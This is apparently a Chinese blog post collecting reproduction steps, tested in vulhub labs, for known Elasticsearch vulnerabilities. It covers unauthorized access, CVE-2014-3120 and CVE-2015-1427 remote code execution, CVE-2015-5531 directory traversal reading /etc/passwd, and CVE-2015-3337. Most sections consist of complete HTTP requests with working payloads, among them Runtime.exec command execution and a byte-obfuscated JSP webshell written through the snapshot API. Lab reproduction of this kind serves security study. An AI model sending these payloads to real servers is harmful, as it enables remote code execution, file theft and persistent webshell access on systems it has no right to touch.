Elasticsearch 常见漏洞复现合集
Elasticsearch未授权访问一、漏洞简介ElasticSearch 是一款Java编写的企业级搜索服务,启动此服务默认会开放HTTP-9200端口,可被非法操作数据。二、影响版本ALL三、复现过程复现环境vulhub复现步骤安装了river之后可以同步多种数据库数据(包括关系型的mysql、mongodb等)。http://xxxxxxxx:9200/_cat/indices 里面的ind
Elasticsearch未授权访问
一、漏洞简介
ElasticSearch 是一款Java编写的企业级搜索服务,启动此服务默认会开放HTTP-9200端口,可被非法操作数据。
二、影响版本
ALL
三、复现过程
复现环境
vulhub
复现步骤
直接get请求即可
http://xxxxxxxx:9200/_cat/indices 里面的indices包含了_river一般就是安装了river了。
http://xxxxxxxx:9200/_plugin/head/ web管理界面
http://xxxxxxxx:9200/_nodes 查看节点数据
http://xxxxxxxx:9200/_river/_search 查看数据库敏感信息
四、xpocsutie3检测
verify
ElasticSearch 命令执行漏洞(CVE-2014-3120)
一、漏洞简介
老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。
二、影响版本
三、复现过程
复现环境
vulhub
复现步骤
该漏洞需要es中至少存在一条数据,所以我们需要先创建一条数据。
插入一条新数据
POST /website/blog/ HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 32
{
"name": "test"
}
命令执行
POST /_search?pretty HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 366
{
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {
}
}
}
},
"script_fields": {
"command": {
"script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
}
}
}
四、xpocsutie3检测
verify
attack
ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞(CVE-2015-1427)
一、漏洞简介
CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。本漏洞:1.是一个沙盒绕过; 2.是一个Goovy代码执行漏洞。
二、影响版本
三、复现过程
漏洞分析
ElasticSearch支持使用“在沙盒中的”Groovy语言作为动态脚本,但显然官方的工作并没有做好。lupin和tang3分别提出了两种执行命令的方法:
- 既然对执行Java代码有沙盒,lupin的方法是想办法绕过沙盒,比如使用Java反射
- Groovy原本也是一门语言,于是tang3另辟蹊径,使用Groovy语言支持的方法,来直接执行命令,无需使用Java语言
所以,根据这两种执行漏洞的思路,我们可以获得两个不同的POC。
Java沙盒绕过法:
java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("id").getText()
Goovy直接执行命令法:
def command='id';def res=command.execute().text;res
复现步骤
该漏洞需要es中至少存在一条数据,所以我们需要先创建一条数据。
添加一条数据
POST /test/test/ HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 24
{
"name": "test"
}
执行命令
POST /_search?pretty HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 156
{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}
四、xpocsutie3检测
verify
attack
ElasticSearch 目录穿越漏洞(CVE-2015-5531)(WooYun-2015-110216)
一、漏洞简介
elasticsearch 1.5.1及以前,无需任何配置即可触发该漏洞。之后的新版,配置文件elasticsearch.yml中必须存在path.repo,该配置值为一个目录,且该目录必须可写,等于限制了备份仓库的根位置。不配置该值,默认不启动这个功能。
WooYun-2015-110216 利用环境和CVE-2015-5531一致,可向服务器写入文件,如果服务器有web服务的话,可以向web目录写入webshell。
二、影响版本
1.6.1以下
三、复现过程
复现环境
vulhub
复现步骤
1.新建一个仓库
PUT /_snapshot/test HTTP/1.1
Host: 10.255.247.110:8901
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 53
{"type": "fs", "settings": {"location": "/tmp/test"}}
2.创建一个快照
PUT /_snapshot/test2 HTTP/1.1
Host: 10.255.247.110:8901
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 70
{"type": "fs","settings": {"location": "/tmp/test/snapshot-backdata"}}
3.读取文件
GET /_snapshot/test/backdata%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Elasticsearch写入webshell漏洞(WooYun-2015-110216)
这个环境里没有web服务,测试向tmp/test目录写入webshell
1.创建一个恶意索引文档
POST /yz.jsp/yz.jsp/1 HTTP/1.1
Host: x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 228
{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}
2.创建一个恶意的存储库,其中location的值即为要写入的路径
PUT /_snapshot/yz.jsp HTTP/1.1
Host: 10.255.247.110:8901
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 118
{
"type": "fs",
"settings": {
"location": "/tmp/test/",
"compress": false
}
}
3.存储库验证并创建
PUT /_snapshot/yz.jsp/yz.jsp HTTP/1.1
Host: x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 103
{
"indices": "yz.jsp",
"ignore_unavailable": "true",
"include_global_state": false
}
4.查看写入的webshell内容:
四、xpocsutie3检测
verify
attack
ElasticSearch 插件目录穿越漏洞(CVE-2015-3337)
一、漏洞简介
在安装了具有“site”功能的插件以后,插件目录使用../即可向上跳转,导致目录穿越漏洞,可读取任意文件。没有安装任意插件的elasticsearch不受影响。
二、影响版本
1.4.5以下/1.5.2以下
三、复现过程
复现环境
无
漏洞分析
复现步骤
这个除了要ES版本满足外,还需要使具有“site”功能的插件才可利用,测试时使用vulhub搭建失败,目前仅做记录,后续如果再遇到再补充
head插件提供了elasticsearch的前端页面,访问 http://your-ip:9200/_plugin/head/ 即可看到
访问http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd读取任意文件(不要在浏览器访问):
为开发者提供学习成长、分享交流、生态实践、资源工具等服务,帮助开发者快速成长。
更多推荐
1
0- 0
已为社区贡献1条内容
所有评论(0)